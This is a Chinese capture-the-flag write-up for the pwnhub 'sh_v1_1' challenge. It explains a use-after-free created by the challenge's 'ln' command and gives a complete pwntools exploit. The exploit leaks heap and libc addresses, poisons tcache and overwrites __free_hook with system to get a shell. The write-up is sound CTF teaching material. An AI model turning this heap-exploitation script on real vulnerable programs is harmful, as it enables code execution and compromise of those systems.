【pwn】pwnhub 3月公开赛|PWN专场 sh_v1_1
创始人
2024-06-02 06:49:30
0

【pwn】pwnhub 3月公开赛|PWN专场 sh_v1_1

逆向分析

本题的逆向难度说难也不难,说不难也挺难。如果不看一大堆bss段上的计算处理,那么其实非常的简单,一共就实现了7个功能,分别是:

  1. touch(使用malloc申请一个chunk,同时可以写入0x208的数据)

    image-20230311144606017

  2. gedit(能修改某个chunk的0x200的数据)

    image-20230311144706277

  3. rm(free一个chunk,不存在uaf,但是可以配合ln完成类似uaf的操作)

    image-20230311144723577

  4. ln(本题的漏洞点,如果在rm一个文件之前,奖一个文件ln了即将被删除的文件,那么这个文件仍然能被gedit,和cat)

    image-20230311144739962

  5. cat(用于显示chunk中的数据)

    image-20230311144627526

  6. cp(malloc一个chunk,复制内容进去,本人的wp中完全没用到这个?!)

  7. ls(显示当前的所有文件,其实也没啥用)

解题思路

ln的操作能够在不malloc的情况下,将存储chunk信息、filename信息等信息的控制块的chunk地址字段,将其指定为被软连接的chunk的地址

由于free后存在置0的操作,所以假设file1被free了,那么file1就会从控制块中被删除置零

但是如果我们在free file1的操作前使用ln file1 file2,那么file2这个字段在控制块中即使file1被删除了,file2也不会删除,这就造成了uaf的操作

一旦能够使用uaf了,那么就使用打__free_hooksystem然后free("/bin/sh\x00")的操作就能完成了

本人的具体操作是修改某个tcache的fd改位tcache的控制块,然后将控制块free获取libc基地址,再修改控制块让fd修改为__free_hook,再touch一次让__free_hook的位置写入system

最后执行free某个chunk内容为/bin/sh\x00的chunk就可以获取shell了

通过不断切换libc版本发现远程libc版本为2.31-0ubuntu9

image-20230311145317340

完整exp如下:

#!/usr/bin/python3
# -*- coding: UTF-8 -*-
# -----------------------------------
# @File    :  exp.py
# @Author  :  woodwhale
# @Time    :  2023/03/11 13:39:10
# -----------------------------------#* https://github.com/Awoodwhale/pwn_all_in_one
from pwntools import *init("./sh_v1.1")io: tube = pwnio.io
elf: ELF = pwnio.elf
libc: ELF = pwnio.libccmd = lambda s: sla(">>>>", s)def add(filename, content="a"*8+"\n"):cmd(f"touch {filename}")s(content)def gedit(filename, content):cmd(f"gedit {filename}")s(content)def rm(filename):cmd(f"rm {filename}")def cat(filename):cmd(f"cat {filename}")def cp(file1, file2):cmd(f"cp {file1} {file2}")def ln(file1, file2):cmd(f"ln {file1} {file2}")add("wood1")
add("wood2")
add("null1")
add("null2")
add("/bin/sh", "/bin/sh\x00\n")ln("wood2", "wood3")rm("null1")
rm("wood2")ln("wood3", "wood4")
cat("wood4")tcache_base = leak(uu64(rl()) - 1728, "tcache_base")gedit("wood4", p64(tcache_base+0x10)+b"\n")
add("null4")
add("wood5", b"\x07"*8*14+b"\n")ln("wood5", "wood6")rm("wood5")cat("wood6")
main_arena = leak(l64(), "main_arena+96")
libc.address = leak(main_arena - (libc.sym["__malloc_hook"]+0x10+96), "libc_base")
free_hook = libc.sym["__free_hook"]
system_addr = libc.sym["system"]gedit("wood6", b"\x01"*8*14+p64(free_hook)*40+b"\n")add("woodwhale", p64(system_addr) + b"\n")rm("/bin/sh")
# dbg()ia()

相关内容

热门资讯

电视安卓系统哪个品牌好,哪家品... 你有没有想过,家里的电视是不是该升级换代了呢?现在市面上电视品牌琳琅满目,各种操作系统也是让人眼花缭...
安卓会员管理系统怎么用,提升服... 你有没有想过,手机里那些你爱不释手的APP,背后其实有个强大的会员管理系统在默默支持呢?没错,就是那...
安卓系统软件使用技巧,解锁软件... 你有没有发现,用安卓手机的时候,总有一些小技巧能让你玩得更溜?别小看了这些小细节,它们可是能让你的手...
安卓系统提示音替换 你知道吗?手机里那个时不时响起的提示音,有时候真的能让人心情大好,有时候又让人抓狂不已。今天,就让我...
安卓开机不了系统更新 手机突然开不了机,系统更新还卡在那里,这可真是让人头疼的问题啊!你是不是也遇到了这种情况?别急,今天...
安卓系统中微信视频,安卓系统下... 你有没有发现,现在用手机聊天,视频通话简直成了标配!尤其是咱们安卓系统的小伙伴们,微信视频功能更是用...
安卓系统是服务器,服务器端的智... 你知道吗?在科技的世界里,安卓系统可是个超级明星呢!它不仅仅是个手机操作系统,竟然还能成为服务器的得...
pc电脑安卓系统下载软件,轻松... 你有没有想过,你的PC电脑上安装了安卓系统,是不是瞬间觉得世界都大不一样了呢?没错,就是那种“一机在...
电影院购票系统安卓,便捷观影新... 你有没有想过,在繁忙的生活中,一部好电影就像是一剂强心针,能瞬间让你放松心情?而我今天要和你分享的,...
安卓系统可以写程序? 你有没有想过,安卓系统竟然也能写程序呢?没错,你没听错!这个我们日常使用的智能手机操作系统,竟然有着...
安卓系统架构书籍推荐,权威书籍... 你有没有想过,想要深入了解安卓系统架构,却不知道从何下手?别急,今天我就要给你推荐几本超级实用的书籍...
安卓系统看到的炸弹,技术解析与... 安卓系统看到的炸弹——揭秘手机中的隐形威胁在数字化时代,智能手机已经成为我们生活中不可或缺的一部分。...
鸿蒙系统有安卓文件,畅享多平台... 你知道吗?最近在科技圈里,有个大新闻可是闹得沸沸扬扬的,那就是鸿蒙系统竟然有了安卓文件!是不是觉得有...
宝马安卓车机系统切换,驾驭未来... 你有没有发现,现在的汽车越来越智能了?尤其是那些豪华品牌,比如宝马,它们的内饰里那个大屏幕,简直就像...
p30退回安卓系统 你有没有听说最近P30的用户们都在忙活一件大事?没错,就是他们的手机要退回安卓系统啦!这可不是一个简...
oppoa57安卓原生系统,原... 你有没有发现,最近OPPO A57这款手机在安卓原生系统上的表现真是让人眼前一亮呢?今天,就让我带你...
安卓系统输入法联想,安卓系统输... 你有没有发现,手机上的输入法真的是个神奇的小助手呢?尤其是安卓系统的输入法,简直就是智能生活的点睛之...
怎么进入安卓刷机系统,安卓刷机... 亲爱的手机控们,你是否曾对安卓手机的刷机系统充满好奇?想要解锁手机潜能,体验全新的系统魅力?别急,今...
安卓系统程序有病毒 你知道吗?在这个数字化时代,手机已经成了我们生活中不可或缺的好伙伴。但是,你知道吗?即使是安卓系统,...
奥迪中控安卓系统下载,畅享智能... 你有没有发现,现在汽车的中控系统越来越智能了?尤其是奥迪这种豪华品牌,他们的中控系统简直就是科技与艺...